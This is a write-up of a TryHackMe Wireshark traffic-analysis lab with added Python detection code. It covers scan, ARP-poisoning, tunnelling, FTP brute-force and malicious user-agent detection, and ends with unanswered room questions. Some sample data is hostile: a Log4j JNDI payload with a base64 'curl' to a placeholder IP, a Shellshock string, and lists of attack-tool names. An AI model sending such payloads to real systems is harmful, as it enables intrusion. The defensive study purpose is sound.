We covered the second part of the Wireshark tutorials, where we went over traffic analysis using advanced display filters. We analyzed network traffic across protocols such as HTTP and DNS, and also covered analyzing Nmap scans, ARP poisoning attacks and SSH tunneling. Additionally, we explained how to extract clear-text credentials passed over insecure protocols such as HTTP and FTP. This was part of TryHackMe Wireshark Traffic Analysis, SOC Level 1.

Detecting Nmap Scans

One of the first things I tackled was detecting Nmap scans. I discovered how to identify TCP connect scans by filtering for specific TCP flags (SYN=1, ACK=0) and a window size larger than 1024 bytes. I also learned to determine the exact scan type used for a port by observing the packet flow: a SYN, SYN-ACK, ACK sequence, for instance, clearly indicates a TCP connect scan. For UDP scans, I found that I could count closed-port messages by filtering for a specific ICMP type and code (type 3, code 3), since a closed UDP port answers a probe with an ICMP port unreachable message. To pinpoint open UDP ports within a range, I learned to exclude closed ports using a “not equal” filter for ICMP type/code and then filter specifically for UDP.
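To make the per-port reasoning behind those filters explicit, here is an added Python example (not code from the video or the TryHackMe room). It reproduces the same logic over a constructed packet list: the SYN-with-large-window heuristic for connect scans, scan-type inference from the flag sequence on each port, the ICMP type 3/code 3 count, and UDP port states for a port range. The addresses, port numbers and window sizes are placeholders I made up for the example.

```python
# Added example (not from the TryHackMe room or this post): reproduce the Nmap
# scan-detection logic of the display filters in Python over a constructed
# packet list, so the per-port reasoning is explicit and testable.
from collections import defaultdict

SCANNER = "10.0.0.5"   # constructed scanner address
TARGET = "10.0.0.9"    # constructed target address


def tcp(src, dst, sport, dport, flags, win):
    # flags use tcpdump letters: S=SYN, A=ACK, R=RST; win mirrors tcp.window_size
    return {"proto": "tcp", "src": src, "dst": dst, "sport": sport,
            "dport": dport, "flags": flags, "win": win}


def udp(src, dst, sport, dport):
    return {"proto": "udp", "src": src, "dst": dst, "sport": sport, "dport": dport}


def icmp_unreachable(src, dst, quoted_dport):
    # ICMP type 3 / code 3 (port unreachable); the error quotes the UDP port probed
    return {"proto": "icmp", "src": src, "dst": dst, "type": 3, "code": 3,
            "quoted_dport": quoted_dport}


# Constructed capture, in arrival order.
PACKETS = [
    # port 80: SYN, SYN/ACK, ACK with an OS-default window: TCP connect scan
    tcp(SCANNER, TARGET, 40001, 80, "S", 64240),
    tcp(TARGET, SCANNER, 80, 40001, "SA", 29200),
    tcp(SCANNER, TARGET, 40001, 80, "A", 64240),
    tcp(SCANNER, TARGET, 40001, 80, "RA", 64240),
    # port 22: SYN, SYN/ACK, RST with a 1024-byte window: SYN (half-open) scan
    tcp(SCANNER, TARGET, 40002, 22, "S", 1024),
    tcp(TARGET, SCANNER, 22, 40002, "SA", 29200),
    tcp(SCANNER, TARGET, 40002, 22, "R", 1024),
    # port 23: SYN answered by RST/ACK: closed
    tcp(SCANNER, TARGET, 40003, 23, "S", 1024),
    tcp(TARGET, SCANNER, 23, 40003, "RA", 0),
    # port 8080: SYN never answered: filtered
    tcp(SCANNER, TARGET, 40004, 8080, "S", 64240),
    # UDP probes: 55 and 56 closed, 57 answers, 58 stays silent
    udp(SCANNER, TARGET, 50001, 55), icmp_unreachable(TARGET, SCANNER, 55),
    udp(SCANNER, TARGET, 50002, 56), icmp_unreachable(TARGET, SCANNER, 56),
    udp(SCANNER, TARGET, 50003, 57), udp(TARGET, SCANNER, 57, 50003),
    udp(SCANNER, TARGET, 50004, 58),
]


def count_connect_scan_probes(packets, scanner):
    """tcp.flags.syn == 1 && tcp.flags.ack == 0 && tcp.window_size > 1024.
    Nmap's raw SYN scan sets a 1024-byte window; connect() scans inherit the
    OS default, which is far larger."""
    return sum(1 for p in packets if p["proto"] == "tcp" and p["src"] == scanner
               and p["flags"] == "S" and p["win"] > 1024)


def classify_tcp_ports(packets, scanner):
    """Infer port state and scan type from the flag sequence on each target port."""
    flows = defaultdict(list)
    for p in packets:
        if p["proto"] == "tcp":
            port = p["dport"] if p["src"] == scanner else p["sport"]
            flows[port].append(p["flags"])
    result = {}
    for port, seq in flows.items():
        if seq[:2] == ["S", "SA"]:
            third = seq[2] if len(seq) > 2 else ""
            kind = {"A": "TCP connect scan", "R": "SYN (half-open) scan"}.get(third, "unknown")
            result[port] = ("open", kind)
        elif seq[:2] == ["S", "RA"]:
            result[port] = ("closed", "undetermined")
        else:
            result[port] = ("filtered", "undetermined")
    return result


def count_udp_closed_port_messages(packets):
    """icmp.type == 3 && icmp.code == 3"""
    return sum(1 for p in packets
               if p["proto"] == "icmp" and p["type"] == 3 and p["code"] == 3)


def udp_port_states(packets, scanner, target, ports):
    """closed = an ICMP port unreachable quoted the port; open = a UDP reply came
    back; open|filtered = probe sent and nothing returned (Nmap's own wording)."""
    probed = {p["dport"] for p in packets if p["proto"] == "udp" and p["src"] == scanner}
    closed = {p["quoted_dport"] for p in packets
              if p["proto"] == "icmp" and p["type"] == 3 and p["code"] == 3}
    answered = {p["sport"] for p in packets if p["proto"] == "udp" and p["src"] == target}
    states = {}
    for port in sorted(probed & set(ports)):
        states[port] = "closed" if port in closed else "open" if port in answered else "open|filtered"
    return states


if __name__ == "__main__":
    print("connect-scan probes:", count_connect_scan_probes(PACKETS, SCANNER))
    print("tcp ports:", classify_tcp_ports(PACKETS, SCANNER))
    print("udp closed-port messages:", count_udp_closed_port_messages(PACKETS))
    print("udp 55-70:", udp_port_states(PACKETS, SCANNER, TARGET, range(55, 71)))
```

The window-size heuristic and the flag-sequence check answer different questions: the first counts probes quickly, the second tells you per port whether the handshake completed (connect scan) or was torn down with a RST (half-open scan). Note that a UDP port that never answers is reported as open|filtered, which is also what Nmap itself reports.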

Analyzing ARP for Poisoning and MITM Attacks

Next, I moved on to ARP packets to look for poisoning and Man-in-the-Middle (MITM) attacks. I learned to spot ARP requests crafted by an attacker and how to extract the attacker’s MAC address from these packets. I could even count the number of ARP requests sent by the attacker using their MAC address and ARP opcode 1. Crucially, I figured out how to filter HTTP packets that the attacker received by using their MAC address as the destination. This allowed me to extract sniffed usernames and passwords from HTTP POST requests by filtering for the specific host and request method.
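The filters above assume you already know the attacker's MAC. An added Python example (not from the video or the room) shows how to get there from the capture itself: collect every IP-to-MAC claim from ARP sender fields, flag IPs announced by more than one MAC, identify the MAC involved in conflicts for both ends of a conversation, then count that MAC's requests and the HTTP frames it received on someone else's behalf. All frames, MACs and IPs are constructed placeholders.

```python
# Added example (not from the room or this post): spot ARP poisoning from
# conflicting IP-to-MAC claims, count the attacker's ARP requests, and flag the
# HTTP frames the attacker received on behalf of someone else. All frames below
# are constructed; addresses are placeholders.
from collections import Counter, defaultdict

GATEWAY_IP, VICTIM_IP = "192.168.1.1", "192.168.1.10"
GATEWAY_MAC, VICTIM_MAC = "00:11:22:33:44:fe", "00:11:22:33:44:01"
ATTACKER_MAC, ATTACKER_IP = "aa:aa:aa:aa:aa:aa", "192.168.1.66"
ZERO = "00:00:00:00:00:00"


def arp(opcode, smac, sip, tmac, tip):
    # opcode 1 = request, 2 = reply; s* = sender fields, t* = target fields.
    # For ARP frames eth.src normally equals the sender MAC, so smac stands in for it.
    return {"op": opcode, "smac": smac, "sip": sip, "tmac": tmac, "tip": tip}


ARP_FRAMES = [
    arp(1, VICTIM_MAC, VICTIM_IP, ZERO, GATEWAY_IP),         # normal who-has
    arp(2, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),  # normal is-at
    # poisoning: the attacker keeps "asking" while putting the gateway's and the
    # victim's addresses in the sender fields, so both caches learn its MAC
    arp(1, ATTACKER_MAC, GATEWAY_IP, ZERO, VICTIM_IP),
    arp(1, ATTACKER_MAC, VICTIM_IP, ZERO, GATEWAY_IP),
    arp(1, ATTACKER_MAC, GATEWAY_IP, ZERO, VICTIM_IP),
]

# Ethernet/IP view of HTTP frames. Frames relayed through a MITM have the
# attacker's MAC as eth.dst but an ip.dst that is not the attacker's own.
HTTP_FRAMES = [
    {"eth.dst": ATTACKER_MAC, "ip.src": VICTIM_IP, "ip.dst": "203.0.113.20"},     # relayed
    {"eth.dst": ATTACKER_MAC, "ip.src": VICTIM_IP, "ip.dst": "203.0.113.20"},     # relayed
    {"eth.dst": ATTACKER_MAC, "ip.src": "203.0.113.20", "ip.dst": ATTACKER_IP},   # attacker's own
    {"eth.dst": VICTIM_MAC, "ip.src": "203.0.113.20", "ip.dst": VICTIM_IP},       # direct to victim
]


def ip_mac_claims(frames):
    """Every sender (ip -> set of MACs) seen in requests and replies alike."""
    claims = defaultdict(set)
    for f in frames:
        claims[f["sip"]].add(f["smac"])
    return claims


def conflicting_ips(frames):
    """IPs announced by more than one MAC: the primary ARP-poisoning signal."""
    return {ip: macs for ip, macs in ip_mac_claims(frames).items() if len(macs) > 1}


def suspected_attackers(frames):
    """MACs involved in conflicts for at least two different IPs (a poisoner
    impersonates both ends of the conversation it wants to sit between)."""
    hits = Counter(mac for macs in conflicting_ips(frames).values() for mac in macs)
    return {mac for mac, n in hits.items() if n >= 2}


def count_arp_requests(frames, mac):
    """eth.src == mac && arp.opcode == 1"""
    return sum(1 for f in frames if f["smac"] == mac and f["op"] == 1)


def relayed_http(frames, attacker_mac, attacker_ips):
    """eth.dst == attacker MAC but ip.dst is not the attacker: traffic the
    attacker received only because a poisoned ARP cache points at it."""
    return [f for f in frames
            if f["eth.dst"] == attacker_mac and f["ip.dst"] not in attacker_ips]


if __name__ == "__main__":
    print("conflicts:", conflicting_ips(ARP_FRAMES))
    print("suspected attacker MACs:", suspected_attackers(ARP_FRAMES))
    print("attacker ARP requests:", count_arp_requests(ARP_FRAMES, ATTACKER_MAC))
    print("relayed HTTP frames:", len(relayed_http(HTTP_FRAMES, ATTACKER_MAC, {ATTACKER_IP})))
```

The conflict table is what Wireshark's own "duplicate IP address detected" expert info is based on; keeping the check in code lets you run it over a whole capture export and also separates the attacker's own browsing from the frames it merely relayed.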

Diving into DHCP, NetBIOS, and Kerberos Traffic

I also explored analyzing DHCP, NetBIOS, and Kerberos traffic with the goal of extracting identifying information like hostnames, MAC addresses, IP addresses, and usernames. I practiced filtering for NetBIOS (NBNS) registration requests using the NBNS flags opcode (5) and searching for specific hostnames within the NBNS name attribute. I found out how to identify which host requested a specific IP address by filtering DHCP packets for the “requested IP address” option and then examining the hostname option. Lastly, I learned to find a user’s IP address by filtering Kerberos packets for a CName string containing the username and then checking the source/destination IP. I could also list hostnames from Kerberos packets by simply filtering for the CName string.
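For the DHCP part, an added Python example (not from the video or the room) shows what the “requested IP address” filter is actually reading: a minimal DHCP option parser that walks the TLV options after the magic cookie, pulls option 50 (requested IP) and option 12 (hostname) together with the client hardware address, and rejects truncated messages. The DHCP messages are constructed in the block; the hostnames and MACs are placeholders, and only the 172.16.13.85 address is reused from the room question.

```python
# Added example (not from the room or this post): a minimal DHCP option parser
# that answers "which host requested IP X?" the way the
# dhcp.option.requested_ip_address filter plus the hostname option does.
# Messages are constructed here, not captured.
import struct

DHCP_MAGIC = b"\x63\x82\x53\x63"   # magic cookie that starts the options field
OPT_HOSTNAME, OPT_REQUESTED_IP, OPT_MSG_TYPE = 12, 50, 53


def build_dhcp_request(client_mac, hostname, requested_ip):
    """Constructed DHCPREQUEST: fixed 236-byte BOOTP header, cookie, TLV options, end."""
    fixed = struct.pack("!BBBBIHH4s4s4s4s", 1, 1, 6, 0, 0x12345678, 0, 0x8000,
                        b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4)         # 28 bytes
    chaddr = bytes.fromhex(client_mac.replace(":", "")).ljust(16, b"\0")   # 16 bytes
    sname, bootfile = b"\0" * 64, b"\0" * 128                              # 192 bytes
    opts = DHCP_MAGIC
    opts += bytes([OPT_MSG_TYPE, 1, 3])                                     # 3 = DHCPREQUEST
    opts += bytes([OPT_REQUESTED_IP, 4]) + bytes(int(o) for o in requested_ip.split("."))
    opts += bytes([OPT_HOSTNAME, len(hostname)]) + hostname.encode()
    return fixed + chaddr + sname + bootfile + opts + b"\xff"


def parse_dhcp(payload):
    """Return client MAC and a {code: value} option map; reject truncated input."""
    if len(payload) < 240 or payload[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message")
    hlen = payload[2]
    mac = ":".join(f"{b:02x}" for b in payload[28:28 + hlen])
    options, i = {}, 240
    while i < len(payload):
        code = payload[i]
        if code == 255:                 # end option
            break
        if code == 0:                   # pad option carries no length byte
            i += 1
            continue
        if i + 1 >= len(payload):
            raise ValueError("truncated option header")
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError(f"truncated option {code}")
        options[code] = value
        i += 2 + length
    return {"mac": mac, "options": options}


def hostname(msg):
    return msg["options"].get(OPT_HOSTNAME, b"").decode("ascii", errors="replace")


def requested_ip(msg):
    v = msg["options"].get(OPT_REQUESTED_IP)
    return ".".join(str(b) for b in v) if v is not None and len(v) == 4 else None


def hosts_requesting(payloads, ip):
    """dhcp.option.requested_ip_address == ip, then read option 12 and chaddr."""
    return [(hostname(m), m["mac"]) for m in map(parse_dhcp, payloads) if requested_ip(m) == ip]


SAMPLE = [  # constructed messages; hostnames and MACs are placeholders
    build_dhcp_request("02:00:00:aa:bb:01", "phone-example", "172.16.13.85"),
    build_dhcp_request("02:00:00:aa:bb:02", "LAPTOP-EXAMPLE", "172.16.13.90"),
]

if __name__ == "__main__":
    print(hosts_requesting(SAMPLE, "172.16.13.85"))
```

The same pattern (find the packet by one option, then read the identifying option from it) is what you repeat by hand in Wireshark's packet details pane; the parser just makes the offsets explicit.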

Uncovering DNS and ICMP Tunneling/Exfiltration

The video then moved to more advanced topics like DNS and ICMP tunneling/exfiltration. I learned to identify anomalous ICMP packets by filtering for data lengths greater than a standard size (e.g., 64 bytes), which can often indicate tunneling. I could even detect the protocol used in ICMP tunneling (like OpenSSH) by examining the payload data of these unusual packets. For DNS, I discovered how to find malicious DNS queries by filtering for DNS query name lengths greater than a certain value (e.g., 15), as command and control (C2) communications often use longer, encoded domain names. This helped me pinpoint suspicious domain addresses receiving these anomalous queries.
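Both thresholds from that section are easy to run outside Wireshark. The added Python example below (not from the video or the room) parses the query name out of a DNS message to get the same value as dns.qry.name, applies the length threshold, and then goes one step further than the filter: it groups long names by their registered domain, so a single long but legitimate CDN name does not raise an alert while a domain receiving many distinct encoded subdomains does. The ICMP check flags echo payloads over 64 bytes and looks for a printable protocol banner at the start of the payload. The queries, the tunnel-placeholder.test domain and the ICMP payloads are constructed.

```python
# Added example (not from the room or this post): the two tunnelling checks the
# filters express (dns.qry.name.len > 15, icmp && data.len > 64) implemented
# over constructed messages, plus a per-domain grouping so one long but
# legitimate name does not raise an alert on its own.
import math
import struct
from collections import Counter, defaultdict


def build_dns_query(name, txid=0x1234, qtype=16):
    """Constructed DNS query: header, QNAME labels, QTYPE (16 = TXT), QCLASS IN."""
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\0"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def parse_qname(message):
    """Read the first question name from wire format; equals dns.qry.name."""
    labels, i = [], 12
    while True:
        if i >= len(message):
            raise ValueError("truncated name")
        n = message[i]
        if n == 0:
            break
        if n & 0xC0:
            raise ValueError("compression pointer not allowed in a question name")
        labels.append(message[i + 1:i + 1 + n].decode("ascii", errors="replace"))
        i += 1 + n
    return ".".join(labels)


def shannon_entropy(s):
    counts, n = Counter(s), len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def suspicious_domains(messages, min_len=15, min_entropy=2.0, min_unique=3):
    """Group long, high-entropy query names by registered domain (last two
    labels) and report domains receiving many distinct such subdomains."""
    per_domain = defaultdict(set)
    for msg in messages:
        name = parse_qname(msg)
        first_label = name.split(".")[0]
        if len(name) > min_len and shannon_entropy(first_label) >= min_entropy:
            per_domain[".".join(name.split(".")[-2:])].add(name)
    return {d: sorted(names) for d, names in per_domain.items() if len(names) >= min_unique}


def anomalous_icmp(records, max_data_len=64):
    """icmp && data.len > max_data_len; also guess the carried protocol from a
    printable banner at the start of the payload."""
    hits = []
    for idx, rec in enumerate(records):
        if rec["type"] not in (0, 8) or len(rec["data"]) <= max_data_len:
            continue
        head = rec["data"][:16].decode("ascii", errors="replace")
        proto = "SSH" if head.startswith("SSH-") else "unknown"
        hits.append((idx, len(rec["data"]), proto))
    return hits


# Constructed traffic: short benign names, one long but legitimate name, and a
# set of encoded subdomains all sent to the same placeholder domain.
DNS_QUERIES = [build_dns_query(n) for n in [
    "www.example.com", "mail.example.org", "static-assets-cdn.example.net",
    "7a6f6e6531.tunnel-placeholder.test", "9f3c2b1a0d.tunnel-placeholder.test",
    "4e5d6c7b8a.tunnel-placeholder.test", "ping.example.com",
]]
ICMP_RECORDS = [
    {"type": 8, "data": b"\x00" * 56},                                     # normal Linux ping
    {"type": 8, "data": b"SSH-2.0-OpenSSH_example\r\n" + b"\x00" * 100},   # tunnelled SSH banner
    {"type": 0, "data": b"\x00" * 32},                                     # normal Windows ping
]

if __name__ == "__main__":
    print(suspicious_domains(DNS_QUERIES))
    print(anomalous_icmp(ICMP_RECORDS))
```

Length alone (the dns.qry.name.len > 15 filter) is a starting point, not a verdict: plenty of legitimate names are longer than that, which is why the example only reports a domain once it has collected several distinct encoded-looking subdomains.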

Extracting Clear Text Credentials and Analyzing HTTP User Agents

A critical skill I picked up was extracting clear text credentials from FTP and HTTP. I learned to filter for FTP brute-force attempts by looking for a specific FTP response code (530 for failed login). I could also determine the size of a file accessed via FTP and identify uploaded file names by following the FTP stream and looking for upload commands. I even saw how to detect attempts to change file permissions by looking for commands like CHMOD in the FTP stream.
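Following the FTP stream by hand works for one session; the added Python example below (not from the video or the room) does the same reading programmatically over a constructed control-channel transcript: it counts 530 replies, pairs USER/PASS with the reply that accepted or rejected them, pairs SIZE with its 213 answer, lists STOR uploads and catches SITE CHMOD commands. The transcript, file names and passwords are made up for the example.

```python
# Added example (not from the room or this post): parse a followed FTP control
# stream and pull out what the questions ask for: failed logins (530), the size
# reported for a file (213), uploads (STOR) and permission changes (SITE CHMOD).
# The transcript is constructed; ">" marks client lines, "<" server lines.
import re

STREAM = """\
< 220 (vsFTPd 3.0.3)
> USER ftp
< 331 Please specify the password.
> PASS guess1
< 530 Login incorrect.
> USER ftp
< 331 Please specify the password.
> PASS guess2
< 530 Login incorrect.
> USER ftp
< 331 Please specify the password.
> PASS guess3
< 230 Login successful.
> SIZE README.txt
< 213 1032
> STOR notes.docx
< 150 Ok to send data.
< 226 Transfer complete.
> SITE CHMOD 777 notes.docx
< 200 SITE CHMOD command ok.
> QUIT
< 221 Goodbye.
"""


def parse_stream(text):
    """Split the transcript into (direction, line) pairs."""
    turns = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        marker, _, line = raw.partition(" ")
        if marker not in ("<", ">"):
            raise ValueError(f"unmarked line: {raw!r}")
        turns.append(("server" if marker == "<" else "client", line))
    return turns


def count_failed_logins(turns):
    """ftp.response.code == 530"""
    return sum(1 for d, l in turns if d == "server" and l.startswith("530"))


def credentials(turns):
    """(user, password, accepted) for every PASS, judged by the 230/530 that follows."""
    found, user = [], None
    for d, line in turns:
        if d == "client" and line.startswith("USER "):
            user = line[5:]
        elif d == "client" and line.startswith("PASS "):
            found.append([user, line[5:], None])
        elif d == "server" and found and found[-1][2] is None and line[:3] in ("230", "530"):
            found[-1][2] = line.startswith("230")
    return [tuple(f) for f in found]


def file_sizes(turns):
    """Pair each SIZE command with the 213 reply that follows it."""
    sizes, pending = {}, None
    for d, line in turns:
        if d == "client" and line.startswith("SIZE "):
            pending = line[5:]
        elif d == "server" and pending and line.startswith("213 "):
            sizes[pending] = int(line[4:])
            pending = None
    return sizes


def uploads(turns):
    """File names sent with STOR."""
    return [l[5:] for d, l in turns if d == "client" and l.startswith("STOR ")]


def permission_changes(turns):
    """(mode, path) for every SITE CHMOD issued by the client."""
    pat = re.compile(r"^SITE\s+CHMOD\s+(\d+)\s+(\S+)$", re.IGNORECASE)
    hits = []
    for d, line in turns:
        m = pat.match(line) if d == "client" else None
        if m:
            hits.append(m.groups())
    return hits


if __name__ == "__main__":
    turns = parse_stream(STREAM)
    print("failed logins:", count_failed_logins(turns))
    print("credentials:", credentials(turns))
    print("sizes:", file_sizes(turns), "uploads:", uploads(turns))
    print("chmod:", permission_changes(turns))
```

Counting 530 replies gives the brute-force volume; pairing each PASS with the reply that follows it is what tells you which attempt finally worked, and the STOR and SITE CHMOD lines together show what was dropped on the server and how it was prepared for execution.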

For HTTP, I investigated anomalous HTTP user agents that might signal malicious tools (like SQLMap, Nmap, Wfuzz, Nikto) or even user agents indicating Log4j attacks or Base64 encoded commands. The video also highlighted how attackers might use typos in user agents (e.g., “Mosailla” instead of “Mozilla”) to try and deceive analysts.
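An exact match on a handful of tool names misses near-miss spellings and encoded payloads, so here is an added Python example (not from the video or the room) that triages User-Agent values along the lines the section describes: known tool names, a spelling that is close to but not equal to “Mozilla”, the Shellshock marker, the Log4j JNDI marker, and a base64 command embedded in a JNDI payload that is decoded and reduced to a defanged IP. All user agents, the packet numbers and the 203.0.113.77 address are constructed placeholders.

```python
# Added example (not from the room or this post): triage HTTP User-Agent values
# for known tools, near-miss spellings of "Mozilla", Shellshock and Log4j/JNDI
# markers, and base64-encoded commands inside a JNDI payload. All user agents
# and the 203.0.113.77 address are constructed placeholders.
import base64
import difflib
import re

KNOWN_TOOLS = ("sqlmap", "nmap", "wfuzz", "nikto")
SAMPLE_B64 = base64.b64encode(b"curl http://203.0.113.77/").decode()  # constructed payload

USER_AGENTS = {  # constructed: packet number -> User-Agent header
    1: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    2: "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0",
    3: "sqlmap/1.7 (https://sqlmap.org)",
    4: "Mosailla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    5: "() { :;}; echo shellshock-test",
    6: "${jndi:ldap://203.0.113.77:1389/Basic/Command/Base64/" + SAMPLE_B64 + "}",
    7: "Wfuzz/3.1.0",
}


def looks_like_typo(ua, canonical="Mozilla", threshold=0.75):
    """First product token close to, but not equal to, the canonical browser token."""
    token = ua.split("/", 1)[0].strip()
    if token.lower() == canonical.lower():
        return False
    return difflib.SequenceMatcher(None, token.lower(), canonical.lower()).ratio() >= threshold


def decode_base64_commands(ua):
    """Decode .../Base64/<blob> segments; keep only results that are printable ASCII."""
    out = []
    for blob in re.findall(r"/Base64/([A-Za-z0-9+/=]+)", ua):
        try:
            text = base64.b64decode(blob, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            continue
        if text.isprintable():
            out.append(text)
    return out


def defanged_ips(text):
    """IPv4 addresses in text, written with [.] so they are safe to paste into reports."""
    ips = re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", text)
    return [ip.replace(".", "[.]") for ip in ips]


def tags_for(ua):
    tags = [f"tool:{t}" for t in KNOWN_TOOLS if t in ua.lower()]
    if looks_like_typo(ua):
        tags.append("typo:" + ua.split("/", 1)[0].strip())
    if "() {" in ua:
        tags.append("shellshock")
    if "${jndi:" in ua.lower():
        tags.append("log4j-jndi")
    if decode_base64_commands(ua):
        tags.append("base64-command")
    return tags


def anomalous(user_agents):
    """packet number -> tags, for every UA that triggered at least one check."""
    result = {}
    for pkt, ua in user_agents.items():
        tags = tags_for(ua)
        if tags:
            result[pkt] = tags
    return result


if __name__ == "__main__":
    for pkt, tags in anomalous(USER_AGENTS).items():
        print(pkt, tags)
    for cmd in decode_base64_commands(USER_AGENTS[6]):
        print("decoded:", cmd, "contacts:", defanged_ips(cmd))
```

The similarity check is what catches “Mosailla”: the token is compared against “Mozilla” and flagged when it is close but not identical, which a plain equality or contains filter cannot express. Decoding the base64 segment is the same step the room asks for by hand, and emitting the IP defanged keeps the indicator from becoming a live link in a report.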

Decrypting HTTPS Packets

One of the most valuable lessons was about decrypting HTTPS packets. I understood that HTTPS traffic is encrypted, and to gain full visibility, I need the session keys. I learned to use TLS handshake types (type 1 for Client Hello, type 2 for Server Hello) to filter client-server communication over HTTPS. The video then showed me how to supply Wireshark with a TLS key log file (configured under the TLS protocol preferences as the “(Pre)-Master-Secret log filename”) to decrypt HTTPS traffic, allowing me to view it in clear text (e.g., as HTTP/2) and extract information like the “authority” header or even export objects from the decrypted traffic.
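What Wireshark does with that key log file is a lookup: it reads the 32-byte random out of each Client Hello and searches the log for a line with that client random. The added Python example below (not from the video or the room) shows the mechanism end to end: it parses the NSS key log format, builds a minimal Client Hello record, extracts the random from it and reports whether a session can be decrypted. The key log lines, randoms and secrets are constructed; a session whose random has no line in the file stays opaque, which is what you see in Wireshark when the log does not cover a capture.

```python
# Added example (not from the room or this post): how a TLS key log file is
# matched to a capture. The ClientHello's 32-byte random is the lookup key for
# CLIENT_RANDOM (TLS 1.2) or *_TRAFFIC_SECRET (TLS 1.3) lines; without a match
# the session cannot be decrypted. Key log contents and records are constructed.
import struct

RANDOM_A = bytes(range(32))          # session with a TLS 1.2 master secret in the log
RANDOM_B = bytes(range(32, 64))      # TLS 1.3 session with handshake traffic secrets
RANDOM_C = bytes(range(64, 96))      # session missing from the log
KEY_LOG = (
    "# constructed NSS key log, the format SSLKEYLOGFILE produces\n"
    f"CLIENT_RANDOM {RANDOM_A.hex()} {'11' * 48}\n"
    f"CLIENT_HANDSHAKE_TRAFFIC_SECRET {RANDOM_B.hex()} {'22' * 32}\n"
    f"SERVER_HANDSHAKE_TRAFFIC_SECRET {RANDOM_B.hex()} {'33' * 32}\n"
)


def parse_key_log(text):
    """client_random -> {label: secret}; a TLS 1.3 session contributes several lines."""
    keys = {}
    for ln in text.splitlines():
        ln = ln.strip()
        if not ln or ln.startswith("#"):
            continue
        parts = ln.split()
        if len(parts) != 3:
            raise ValueError(f"malformed key log line: {ln!r}")
        label, client_random, secret = parts
        keys.setdefault(bytes.fromhex(client_random), {})[label] = bytes.fromhex(secret)
    return keys


def build_client_hello(client_random):
    """Constructed minimal ClientHello inside a TLS handshake record (type 22)."""
    body = (b"\x03\x03" + client_random   # client_version, random
            + b"\x00"                      # session id length 0
            + b"\x00\x02\x13\x01"          # one cipher suite: TLS_AES_128_GCM_SHA256
            + b"\x01\x00")                 # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # handshake type 1
    return b"\x16\x03\x01" + len(handshake).to_bytes(2, "big") + handshake


def client_random_from_record(record):
    """tls.handshake.type == 1: pull the random out of a ClientHello record."""
    if len(record) < 43:
        raise ValueError("record too short for a ClientHello")
    content_type, _version, length = struct.unpack("!BHH", record[:5])
    if content_type != 22 or len(record) - 5 < length:
        raise ValueError("not a complete handshake record")
    if record[5] != 1:
        raise ValueError("handshake message is not a ClientHello")
    return record[11:43]   # 5-byte record header + 4-byte handshake header + 2-byte version


def session_secrets(record, keys):
    """The secrets Wireshark would have for this session, or None if it cannot decrypt."""
    return keys.get(client_random_from_record(record))


if __name__ == "__main__":
    keys = parse_key_log(KEY_LOG)
    for rnd in (RANDOM_A, RANDOM_B, RANDOM_C):
        print(rnd[:2].hex(), session_secrets(build_client_hello(rnd), keys))
```

Two practical consequences follow from the lookup: the key log only helps for sessions whose Client Hello is in the capture (a capture started mid-session cannot be decrypted), and the log must be written by the client that made the connections, since the browser is the only party that knows these secrets at the time.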

Automatically Extracting Credentials and Creating Firewall Rules

Finally, I discovered some incredibly useful built-in features. Wireshark has a “Tools > Credentials” feature that can automatically list clear text credentials from protocols like FTP and HTTP—a huge time-saver! And to top it off, I learned that Wireshark can even generate firewall rules (for systems like Netfilter, Cisco IOS, IPFilter) based on the captured traffic, showing me how to create rules for denying source IPs or allowing destination MAC addresses.

Key Wireshark Display Filters I Used:

The video primarily focused on Wireshark’s powerful display filters. Here are some of the key filters I learned to use:

  • Nmap Scan Detection:
    • tcp.flags.syn == 1 && tcp.flags.ack == 0 && tcp.window_size > 1024
    • tcp.port == 80
    • icmp.type == 3 && icmp.code == 3
    • udp && !(icmp.type == 3 && icmp.code == 3) (for open UDP ports)
  • ARP Poisoning/MITM:
    • eth.src == 00:0c:29:XX:XX:XX && arp.opcode == 1 (to count attacker’s ARP requests)
    • eth.dst == 00:0c:29:XX:XX:XX && http (to filter HTTP traffic received by the attacker)
    • http.host == "example.com" && http.request.method == "POST" (to find credentials)
  • DHCP, NetBIOS, Kerberos:
    • dhcp
    • nbns.flags.opcode == 5 && nbns.name contains "HOSTNAME"
    • dhcp.option.requested_ip_address == 192.168.1.100
    • kerberos.CNameString contains "u5"
    • kerberos.CNameString (to list hostnames)
  • DNS/ICMP Tunneling:
    • icmp && data.len > 64
    • dns.qry.name.len > 15
  • Clear Text Credentials (FTP/HTTP):
    • ftp.response.code == 530 (for failed FTP logins)
    • ftp.response.code == 213 (for FTP file status)
    • http.user_agent == "sqlmap" || http.user_agent == "nmap" || http.user_agent == "wfuzz" || http.user_agent == "nikto" (for malicious user agents)
    • http.user_agent contains "() { :;};" (for Shellshock/Log4j indicators)
    • http.user_agent contains "Mosailla" (for user agent typos)
  • HTTPS Decryption:
    • tls.handshake.type == 1 (client hello)
    • tls.handshake.type == 2 (server hello)
    • http2 (for decrypted HTTP/2 traffic)

Room Answers

Use the “Desktop/exercise-pcaps/nmap/Exercise.pcapng” file.
What is the total number of the “TCP Connect” scans?

Which scan type is used to scan the TCP port 80?

How many “UDP close port” messages are there?

Which UDP port in the 55-70 port range is open?

Use the “Desktop/exercise-pcaps/arp/Exercise.pcapng” file.
What is the number of ARP requests crafted by the attacker?

What is the number of HTTP packets received by the attacker?

What is the number of sniffed username&password entries?

What is the password of the “Client986”?

What is the comment provided by the “Client354”?

Use the “Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap” file.
What is the MAC address of the host “Galaxy A30”?

How many NetBIOS registration requests does the “LIVALJM” workstation have?

